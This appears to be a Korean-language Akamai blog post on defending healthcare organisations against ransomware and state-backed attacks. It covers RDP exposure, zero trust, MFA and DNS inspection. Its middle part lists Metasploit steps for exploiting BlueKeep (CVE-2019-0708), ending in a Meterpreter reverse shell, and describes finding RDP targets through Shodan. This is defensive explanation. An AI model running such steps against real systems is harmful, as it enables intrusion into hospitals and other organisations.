Akamai 블로그 | 불확실의 시기에 의료 기관 보호
2022년 4월 20일 수요일 합동 사이버 보안 주의보가 발표되어 러시아 정부가 후원하는 사이버 범죄자와 관련된 중요 인프라에 대한 위협을 민간 부문 및 해외 파트너들에게 알렸습니다. 이보다 앞선 시기인 3월 21일, 백악관은 러시아가 미국을 상대로 악의적인 사이버 작전을 수행할 가능성이 두 배로 커졌다고 발표했습니다.
합동 사이버 보안 주의보는 "최근 러시아 정부가 후원하는 사이버 작전에 분산 서비스 거부(DDoS) 공격이 포함됐고 과거 작전에 우크라이나 정부와 주요 인프라 기업을 노리는 멀웨어가 배포됐다"고 경고했습니다. 주의보는 러시아와 연계된 사이버 범죄 단체가 우크라이나를 지원하는 국가와 기업에 대해 사이버 작전을 실시하겠다고 위협했다고 지적했습니다.
미국, 오스트레일리아, 캐나다, 뉴질랜드, 영국으로 구성된 인텔리전스 동맹인 파이브 아이즈의 사이버 보안 당국은 의료 기관 같은 주요 인프라 네트워크의 방어 담당자들에게 사이버 방어를 강화하고 악의적인 활동을 파악하도록 하여 파괴적인 멀웨어, 랜섬웨어, DDoS 공격, 사이버 스파이 등의 잠재적인 사이버 위협에 대비할 것을 촉구했습니다.
여기에는 타당한 이유가 있습니다. McKinsey 디지털화 지수에 따르면 의료 기관은특히 트랜젝션, 작업자에 대한 디지털 지출, 디지털 자본 분야 내에서 디지털화가 가장 덜 진행된 곳 중 하나로 선정됐습니다. 또한 가장 많은 공격을 받은 부문 중 하나로서 전체 랜섬웨어 공격 대상의 11.6%를 차지했습니다. 실제로 국토안보부에 따르면 사이버 공격 피해자는 2020년 3,400만 명에서 2021년 4,500만 명으로 증가했습니다.
사이버 보안 준비 태세를 강화하기 위해 사이버 보안 및 인프라 보안국(CISA)은 Shields Up이라는 정부와 민간 조직이 보안 체계를 강화하는 데 도움을 주는 업데이트와 정보로 구성된 리포지토리를 제공하고 있습니다. Akamai는 CISA와 사이버 방어 협력부를 포함한 국가의 주요 보안 기관과 협력하여 의료 기관과 같은 중요 인프라를 방어하는 방법에 대한 조언을 제공하고 있습니다. Akamai는 의료 기관 보안과 관련해 세 가지 교훈을 얻었습니다.
첫 번째 교훈: 디지털 변환으로 랜섬웨어 같은 멀웨어가 침투할 수 있는 허점이 발생했습니다.
랜섬웨어는 누구에게나 영향을 줄 수 있습니다. 그러나 의료 부문에서 랜섬웨어와 관련된 혼란은 약물 투여가 불가능한 상황부터 치료 중단으로 인해 사람의 목숨을 앗아갈 수 있는 심각한 상황까지 다양하게 나타날 수 있습니다. 실제로, 2021년 앨라배마주에서 병원이 랜섬웨어 공격에 제대로 대응하지 못해 심각한 뇌 손상을 입은 상태로 태어난 아이가 사망했다는 이유로 소송이 일어났습니다.. 환자와 의료 기관의 경험을 최신화하는 데 필수적인 디지털 변환은 공격자에게 새로운 허점과 시스템 취약점을 노출하고 있습니다.
또 다른 예로 리테일 부문에서 신용 카드 사기가 있습니다. 신용 카드에 칩이 추가됨에 따라 오프라인 신용 카드 사기는 사실상 근절됐지만 신용 카드 사기가 완전히 사라진 것은 아닙니다. 사기가 오프라인으로 이동한 것에 불과합니다. 이러한 개념은 의료 부문에도 적용될 수 있습니다. 애플리케이션을 데이터 센터에서 클라우드로, 테스트 결과를 Scantron에서 웹 사이트로, 전자 의료 기록을 병상에서 iPad로 옮기는 디지털 변환에도 보안 조치가 필요합니다.
두 번째 교훈: RDP 및/또는 기타 잠재적으로 위험한 서비스를 사용하는 경우 이를 철저히 보호하고 모니터링해야 합니다.
합동 사이버 보안 주의보는 원격 데스크톱 프로토콜(RDP)을 악용 분야로 특별히 지정했습니다. 주의보에 따르면 "RDP 악용은 랜섬웨어의 주요 초기 감염 벡터 중 하나이며 RDP를 포함한 위험한 서비스를 통해 경로상의 공격자가 세션에 무단 접속할 수 있습니다.”
RDP는 특히 제약 운영 연속성을 유지하는 데 있어서, 또한 의료 전문가에게 중요한 생명선입니다. Windows Remote Desktop은 의료 전문가가 외부에서 중요 워크스테이션에 접속할 수 있는 가장 비용 효율이 높은 방법이 될 수 있습니다. RDP 자체가 항상 리스크가 높은 것은 아니지만, 공격자는 접속 구현 방법이나 사용 중인 RDP의 버전을 악용할 수 있습니다.
RDP 악용 사례와 악용을 막을 방법에 대해 살펴보겠습니다. 공격자는 RDP를 스캔하고 취약점을 발견하면 공격을 시작합니다. 이를 위해 공격자는 시스템을 실제로 스캔하지 않아도 됩니다. 사실 이러한 유형의 청취 프로토콜에 대해 학술적인 목적으로 색인하는 서비스가 많이 있으며, 공격자는 이를 통해 공격 대상을 선정합니다. 그러한 서비스의 예시로 Shodan.io가 있습니다. 이 웹사이트는 인터넷상의 인터넷 연결 디바이스 및 기타 사항을 검색할 수 있는 엔진이라고 할 수 있습니다.
위 Shodan 스크린샷에서 볼 수 있듯이 이 보고서 작성일을 기준으로 미국 내 RDP 식별자에 응답하는 서비스가 2,730개 있습니다. 이 중 582개는 애리조나주 피닉스에 있습니다. 좀 더 자세히 살펴보면 피닉스의 호스팅 제공업체가 RDP 청취 서버의 대부분을 소유하고 있음을 알 수 있습니다. 이를 기반으로 추론한다면 이 개념을 대상 목록의 병원 네트워크나 제약 회사에 적용할 수 있다는 뜻입니다. 그러면 어떻게 될까요? 보시다시피 이 프로세스를 실행하는 데 기술적인 지식은 거의 필요하지 않지만 의료 기관에는 큰 잠재적인 영향을 끼칠 수 있습니다.
공격자는 피해자를 공격하는 동안 오직 해당 취약점만 노리지 않으며 악용할 수 있는 특정 취약점도 찾습니다. RDP의 경우, CVE-2019-0708 취약점이 있습니다. BlueKeep라고 명명된 이 취약점을 통해 공격자는 원격 코드를 실행할 수 있습니다. 즉 공격자는 자신이 선택한 코드를 RDP 서버가 실행하게 만들어 해당 시스템을 악용하거나 완전히 손상할 수 있습니다.
Metasplait 같은 모의 해킹 도구를 사용하면 몇 가지 간단한 명령으로 이 공격을 실행할 수 있습니다.
피해자의 시스템 IP 주소를 설정합니다. RHOSTS x.x.x.x를 설정합니다.
사용할 공격 페이로드를 구성합니다. 페이로드
Windows/x64/meterpreter/reverse_tcp 를 설정합니다. (이 공격에서 BlueKeep 취약점을 이용하여 피해 머신에 대해 원격 명령줄 세션을 수행할 수 있습니다.)공격 머신의 IP 주소를 설정합니다. LHOST x.x.x.x를 설정합니다. (이를 통해 악용이 시작되면 원격 셸에 연결해야 할 IP 주소를 알립니다.)
다음으로 공격 머신이 원격 연결을 청취할 포트를 설정해야 합니다. LPORT 4444를 설정합니다. (포트 4444를 청취하는 다른 서비스는 없기 때문에 포트 4444가 일반적으로 사용됩니다.)
다음으로 이전에 발견한 취약 서비스 목록에서 대상을 설정하기 위해 명령을 발행해야 합니다. target 1을 설정합니다.
이제 마지막으로 exploit 명령을 실행합니다. exploit
- 다음으로 대상 머신의 관리자처럼 ‘Meterpreter’ 커서가 깜박이는 RDP 피해 서버의 명령 프롬프트가 나타납니다.
- 이제 아무도 지켜보고 있지 않다면 원하는 것을 모두 할 수 있습니다.
의료 기관을 보호하려면 RDP의 제한 사항을 반드시 이해해야 합니다.
세 번째 교훈: 새로운 규칙을 따라야 합니다.
이미 많은 의료 기관들이 마이크로세그먼테이션, 백신 및 안티멀웨어 소프트웨어, 이메일 필터링 등의 보안 모범 사례를 구현하고 있지만 여전히 랜섬웨어 공격에 고전하고 있습니다. 왜 그럴까요? 낡은 규칙을 따르고 있기 때문입니다. 기존 규칙의 경우 공격자는 방어 시스템을 우회할 수 있습니다. 낡은 보안 규범을 계속 사용하는 경우 공격자에게 기회가 됩니다. 따라서 사용자는 시스템을 탐색하는 방식을 바꾸고, 제로 트러스트로 전환하여, 좋은 트래픽을 취하겠다는 개념에서 벗어나, 이제는 모든 것을 검사해야 한다는 생각으로 접근해야 합니다.
이러한 새로운 규칙을 구현하는 몇 가지 사례는 다음과 같습니다.
인증: 멀티팩터 인증(MFA)은 더 이상 ‘있으면 좋은 것’이 아니라 ‘필수품’입니다. 가급적 FIDO2 표준에 기반한 MFA 솔루션을 사용하여 업계 최고의 MFA 벤더조차 당한 신분 도용을 막아야 합니다.
원격 접속: 원격 사용자의 워크스테이션을 내부 네트워크에 연결하여 신뢰할 수 있는 리소스에 접속할 수 있게 하는 것은 과거의 일입니다. 제로 트러스트 원격 접속 기술을 사용하면 원격 사용자가 신뢰할 수 있는 리소스가 있는 로컬 네트워크에 머신을 설치하지 않아도 리소스에 접속할 수 있습니다. 이는 일반적으로 역방향 프록시 연결을 통해 이루어지며, 방화벽에 구멍을 만들거나 기업 네트워크를 잠재적인 위험에 노출하지 않고 사용자에게 애플리케이션 경험을 가상화하여 제공할 수 있습니다.
정상 트래픽 검사: 대부분의 멀웨어, 랜섬웨어, 악성 소프트웨어의 명령 및 제어(C2) 통신은 대부분 HTTP 요청을 통해 인터넷에 접속하고 C2나 페이로드 서버의 위치를 찾습니다. 이 요청은 다른 HTTP 요청처럼 네트워크를 떠나므로 탐지되지 않는 경우가 많습니다. 다행히 이러한 유형의 악성 트래픽은 ‘폰 홈’을 시도하는 최초 DNS 요청을 우선 조사하여 검사할 수 있습니다. DNS 관련 트래픽을 검사하여 악의적인 URL, 합법적인 도메인으로 가장하려는 DGA, DNS 요청 자체에서 민감한 정보를 인코딩할 수 있는 데이터 유출 시도도 파악할 수 있습니다. DNS 검사를 통해 최초 HTTP 요청이 처음 연결하기 전에도 이러한 잠재적 위험을 미리 확인할 수 있습니다.
소프트웨어 정의 마이크로세그멘테이션: 네트워크를 분할하고 네트워크의 동서 트래픽 범위를 제한하는 규칙을 제공하는 기술도 있었지만, 공격자들은 상호 대화할 것으로 ‘예상’되는 알려진 호스트 사이의 신뢰 관계를 악용하여 이러한 규칙을 우회하는 방법을 찾고 있습니다. 이러한 규칙은 악용을 막기 위해 두 머신 사이에 실제로 일어나고 있는 것을 확인할 방법이 없다는 데 문제가 있습니다.
또한 신뢰할 수 있는 머신에 호스팅 된 실제 애플리케이션의 동작 방식에 따라 규칙이 지속해서 업데이트되지 않는다는 것도 문제입니다. 즉, 분할 룰세트가 변화 없이 유지되어 매우 빠르게 효과를 잃게 됩니다. 소프트웨어 정의 마이크로세그멘테이션을 통하면 네트워크에서 실제로 실행되는 라이브 애플리케이션과 애플리케이션 간 관계를 확인할 수 있습니다. 이후 규칙을 만들어 관계를 정의하고 예기치 않은 멀웨어 공격의 영향을 차단할 수 있습니다.
결론
어떤 조직이든 보안 취약점을 관리하는 것은 어렵습니다. 매일 온라인 관리, 운영 연속성, 수백만 명의 개인 건강 정보를 관리하는 것은 어떨까요? 엄청나게 어렵습니다. Akamai는 의료 기관이 끊임없이 진화하는 사이버 범죄와 위협으로부터 자신을 보호하는 데 도움을 줄 수 있습니다.
지금 문의하시기 바랍니다.
